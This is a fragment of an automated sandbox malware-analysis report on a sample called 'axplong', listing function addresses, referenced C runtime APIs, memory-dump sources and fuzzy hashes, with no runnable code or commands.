                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___free_lconv_mon
                                        • String ID: 8"F$`'F
                                        • API String ID: 3903695350-3117062166
                                        • Opcode ID: 7cc84738d4ada6297d6a0fb0f14596f6b5ef1043b6aead768a540562b0a62405
                                        • Instruction ID: 16833f8704bef9767550e365d62d6ec02a0348751fb53c48f95eca9ca5c43528
                                        • Opcode Fuzzy Hash: 7cc84738d4ada6297d6a0fb0f14596f6b5ef1043b6aead768a540562b0a62405
                                        • Instruction Fuzzy Hash: 0E317231A00305DFDB21AB79D905B5773E5AF08314F10646FE886D7252DF7AEC588B19
                                        Function 00403930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Mtx_init_in_situ.LIBCPMT ref: 00403962
                                        • __Mtx_init_in_situ.LIBCPMT ref: 004039A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Mtx_init_in_situ
                                        • String ID: pB@
                                        • API String ID: 3366076730-522444117
                                        • Opcode ID: 853d83a076cbc7226a509cdb9e842d0995eb72176d5c94cff8f73588fd830228
                                        • Instruction ID: a26189a986e4dd1b89f6ce3af94e59f84d9fcc23830c965df4aad3e38ef2e394
                                        • Opcode Fuzzy Hash: 853d83a076cbc7226a509cdb9e842d0995eb72176d5c94cff8f73588fd830228
                                        • Instruction Fuzzy Hash: C64127B06017059FD720CF19C98475ABBF5FF44315F14862EE86A8B781E7B8A905CF80
                                        Function 00402520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00402552
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: P#@$P#@
                                        • API String ID: 2659868963-3974838576
                                        • Opcode ID: ddf5e71c06a52d7d55740b92384bd183d62590499cadfedb7835ffcaf7cab153
                                        • Instruction ID: 686c2b215b1296f9daec2399383962352f9f2510f431a6a01e91d29dc1f86165
                                        • Opcode Fuzzy Hash: ddf5e71c06a52d7d55740b92384bd183d62590499cadfedb7835ffcaf7cab153
                                        • Instruction Fuzzy Hash: 12F0A775D1020DABC714DFA8D8419CEBBF4AF59304F10C2AFE84467241EB746A59CB9D